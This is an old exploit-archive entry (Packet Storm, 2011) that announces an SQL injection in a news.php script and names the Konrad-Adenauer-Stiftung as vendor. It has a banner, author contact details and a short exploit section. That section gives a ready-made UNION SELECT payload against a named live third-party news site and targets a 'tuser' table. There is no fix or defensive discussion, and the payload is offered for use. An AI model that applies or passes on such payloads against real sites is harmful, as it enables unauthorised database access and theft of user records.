Konrad-Adenauer-Stiftung SQL Injection

2011-07-11T00:00:00
ID PACKETSTORM:102945
Type packetstorm
Reporter Skote Vahshat
Modified 2011-07-11T00:00:00

Description

                                        
                                            `|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
|* ______ ____ __ __ |  
|* /\__ _\/\ _`\ /\ \/\ \ |  
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ |  
|* \ \ \ \ \ _ <'\ \ _ \ |  
|* \ \ \ \ \ \L\ \\ \ \ \ \ |  
|* \ \_\ \ \____/ \ \_\ \_\ |  
|* \/_/ \/___/ \/_/\/_/ |  
|* |  
|* |  
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|  
=======================================================================  
\* [Title] :[kas sql injection vulnerability] /*  
\* [Full Name] :[Konrad-Adenauer-Stiftung] /*  
\* [Vender] :[http://www.kas.de] /*  
\* [Author] :[skote_vahshat] /*  
\* [Home] :[Http://Skote-Vahshat.com] /*  
\* [Archive] :[Http://xpl.skote-vahshat.com] /*  
\* [Email] :[skote.vahshat@Gmail.Com] /*  
\* [Date] :[2011/07/09] /*  
=======================================================================  
/* [+]Exploit :  
/* http://www.target.com/home/news.php?id=[SQLi]  
/* [+]Demo:  
/* http://www.asianewsnet.net/home/news.php?id=[SQLi]  
/* http://www.asianewsnet.net/home/news.php?id=19420+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+tuser--  
/*  
=======================================================================  
|_***_| spical thanks : bl4ck.viper ,K0242 and all iraniyan hackers . |  
=======================================================================  
`